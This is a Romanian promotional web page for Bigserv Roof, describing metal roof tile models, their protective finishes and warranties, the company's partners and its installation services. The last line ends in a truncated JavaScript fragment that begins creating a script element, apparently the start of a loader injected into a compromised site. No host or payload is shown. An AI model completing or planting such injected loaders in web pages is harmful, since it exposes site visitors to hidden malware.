tigle metalice

Oferta companiei Bigserv Roof cuprinde o oferta variata de produse: tigle metalice, tabla plana faltuita, jgheaburi si burlane, ferestre de mansarda, accesorii pentru acoperisuri, scari pentru acces pod, accesorii pentru ferestre de mansarda, calculatii acoperisuri, toate la un raport avantajos calitate-pret. Pe langa acestea, echipa companiei asigura si servicii de montaj pentru invelitori si ferestre de mansarda.

De ce sa alegeti tigle metalice pentru acoperisul unei cladiri?

tigle metaliceIndiferent de tipul cladirii pe care doriti sa o construiti sau al carei acoperis doriti sa il inlocuiti, aceste tigle metalice disponibile in stocul nostru reprezinta alegerea perfecta pe care o puteti face, avand in vedere avantajele numeroase pe care le ofera. Tiglele metalice confera o nota aparte, de originalitate si un aspect deosebit intregii cladirii. Sunt rezistente, au o durata indelungata de exploatare, sunt usor de montat, sunt disponibile in variate finisaje, forme, culori si dimensiuni, realizate din materiale de calitate conform celor mai ridicate standarde, cu ajutorul unei tehnologii de ultima ora, fiind prevazute cu diferite straturi de protectie impotriva conditiilor meteo nefavorabile, coroziunii si oricaror factori care le-ar putea afecta calitatea.

Tipuri de tigle metalice

Din oferta Bigserv Roof, puteti opta pentru diverse tipuri de tigle metalice, precum:

  • Tigla metalica Monterrey
  • Tigla metalica Adamante
  • Tigla metalica Finnera

Disponibile in diverse variante in ceea ce priveste sistemul de protectie: lucios standard (recomandat in special pentru proiectele de renovare, dar poate fi alegerea perfecta pentru orice tip de proiect), cu garantie de 30 de ani pentru performantele tehnice si 10 ani pentru performantele estetice; mat plus, disponibil cu sistemul de protectie Purex ce are un finisaj mat usor structurat; are o garantie de 40 de ani pentru performantele tehnice si 15 ani pentru cele estetice; si plural premium, disponibil cu sistemul de protectie Plural Matt, are o garantie de 50 de ani pentru performantele tehnice si 20 de ani pentru performantele estetice.

Mai multe despre tigle metalice

Tiglele metalice au inceput sa castige teren de fiecare data cand vine vorba de „imbracarea” acoperisurilor, iar acest lucru se datoreaza avantajelor de necontestat ale acestora si de care va veti convinge si voi odata ce le veti achizitiona si monta fie pe casa voastra, fie pe orice alt tip de cladire. Acestea au profile remarcabile, care vor incanta cu siguranta chiar si proprietarii de case mai exigenti, pentru care stilul arhitectural este extrem de important. Imbina utilul cu placutul, fiind foarte reusite din punct de vedere estetic, dar si foarte rezistente si practice.

Despre Bigserv Roof

In decursul activitatii sale, compania Bigserv Roof din Bucuresti a reusit sa dezvolte parteneriate stabile cu firme competente, ajutandu-va, impreuna cu acestea, sa adaugati valoare investitiei in locuinta voastra. Printre colaboratorii societatii, se numara: Rukki specializata in constructiile din otel, Fakro si Velux, producatori importanti de ferestre de mansarda.

In functie de necesitati si cerinte, personalul competent si bine pregatit ce activeaza in cadrul Bigserv Roof va ofera solutii profesionale, optime si customizate care sa va multumeasca pe deplin, fie ca este vorba despre tigle metalice sau despre alte produse din oferta noastra. Avem grija ca achizitiile pe care le faceti sa corespunda cu solicitarile voastre, prin serviciile de consultanta de specialitate pe care vi le punem la dispozitie in mod gratuit.var d=document;var s=d.createElement(‘script’);